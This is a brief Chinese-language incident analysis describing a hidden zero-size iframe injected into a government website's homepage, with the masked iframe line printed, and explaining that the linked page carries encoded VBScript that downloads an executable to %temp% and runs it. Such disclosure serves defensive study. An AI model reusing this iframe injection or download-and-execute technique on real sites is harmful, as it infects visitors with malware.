该政府网站首页被加入代码:
/-------- <iframe src=hxxp://www.***.race*s**wd.com.**/w*m***.htm width=0 height=0 frameborder=0></iframe> --------/
w*m***.htm 的内容为escape()加密的VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 1**.exe,保存为 %temp% 中的 asde.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。